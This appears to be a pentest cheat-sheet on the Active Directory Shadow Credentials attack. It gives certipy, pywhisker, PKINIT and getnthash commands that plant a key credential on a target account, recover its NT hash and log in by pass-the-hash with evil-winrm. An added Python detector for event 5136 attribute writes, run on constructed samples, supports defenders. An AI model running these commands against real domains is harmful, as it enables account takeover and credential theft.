Shadow Credentials
1.0 Automatic Shadow Credentials
certipy-ad shadow auto -u "$user@$domain" -p "$pass" -account "$targetuser" -dc-ip "$ip"
Example output (this is certipy's automatic mode: it adds a key credential, requests a TGT with it, recovers the NT hash, then restores the original KeyCredentialLink value):
...
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
2.0 Manual Shadow Credentials
2.1 Manipulate KeyCredentialLink
Add a new key credential to the target's msDS-KeyCredentialLink attribute with pywhisker; it saves the certificate and key as a PFX file and prints the PFX password, which the next step needs:
python pywhisker.py -d 'domain.local' -u "$user" -p "$pass" --target "$targetuser" --action 'add'
2.2 Get a TGT PKI
Request a TGT with PKINIT using the PFX from the previous step, export the resulting ccache, and note the AS-REP encryption key that gettgtpkinit.py prints (it is needed for the next step):
python gettgtpkinit.py -cert-pfx ../pywhisker/$cert.pfx -pfx-pass "$cert_pass" domain.local/$targetuser $targetuser.ccache
export KRB5CCNAME=targetuser.ccache
2.3 Recover NT Hash
getnthash.py uses the TGT from KRB5CCNAME and the AS-REP key from the previous step to decrypt the PAC and read the NT hash:
python getnthash.py -key "$asrep_key" domain.local/$targetuser
2.4 Profit
evil-winrm -i "$ip" -u "$targetuser" -H "$hash"
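From the defender's side, every step above hinges on a write to the target's msDS-KeyCredentialLink attribute (step 2.1, or certipy's automatic mode). On a domain controller with the "Audit Directory Service Changes" subcategory enabled and a SACL on the attribute, that write is logged as Security event 5136. The following is an added detection example, not part of the original page or of certipy/pywhisker; it assumes 5136 events exported as dicts with the event's own field names (SubjectUserName, ObjectDN, AttributeLDAPDisplayName, OperationType), uses constructed sample events, and treats the allowlisted writer name as a hypothetical environment-specific value.

```python
import re

# OperationType as rendered in a 5136 event: %%14674 = Value Added,
# %%14675 = Value Deleted.
VALUE_ADDED = "%%14674"
TARGET_ATTR = "msds-keycredentiallink"
# Accounts that legitimately write this attribute in the (hypothetical)
# environment, e.g. a hybrid-join sync account. Constructed allowlist.
ALLOWED_WRITERS = {"MSOL_sync"}


def cn_from_dn(dn):
    """Return the leading CN= value of a distinguished name, or the DN itself."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else dn


def suspicious_keycredential_writes(events):
    """Return (writer, target) pairs for 5136 events that add a
    msDS-KeyCredentialLink value to an account other than the writer's own,
    from a writer that is not allowlisted."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != TARGET_ATTR:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        writer = ev.get("SubjectUserName", "")
        target = cn_from_dn(ev.get("ObjectDN", ""))
        # A machine writing its own NGC key (WS01$ on CN=WS01) is normal;
        # one principal writing another account's key material is not.
        if writer.rstrip("$").lower() == target.rstrip("$").lower():
            continue
        if writer in ALLOWED_WRITERS:
            continue
        hits.append((writer, target))
    return hits


def _ev(writer, dn, attr, op):
    """Build one constructed 5136 record (sample data, not a real log)."""
    return {"EventID": 5136, "SubjectUserName": writer, "ObjectDN": dn,
            "AttributeLDAPDisplayName": attr, "OperationType": op}


SAMPLE_EVENTS = [
    _ev("WS01$", "CN=WS01,OU=Workstations,DC=domain,DC=local", "msDS-KeyCredentialLink", "%%14674"),
    _ev("jdoe", "CN=winrm_svc,CN=Users,DC=domain,DC=local", "msDS-KeyCredentialLink", "%%14674"),
    _ev("jdoe", "CN=winrm_svc,CN=Users,DC=domain,DC=local", "msDS-KeyCredentialLink", "%%14675"),
    _ev("jdoe", "CN=winrm_svc,CN=Users,DC=domain,DC=local", "description", "%%14674"),
]

if __name__ == "__main__":
    for writer, target in suspicious_keycredential_writes(SAMPLE_EVENTS):
        print(f"ALERT: {writer} added a KeyCredentialLink value to {target}")
```

Because certipy's automatic mode restores the original attribute afterwards, the add and the matching delete land seconds apart; pairing them on the same target is a useful second signal.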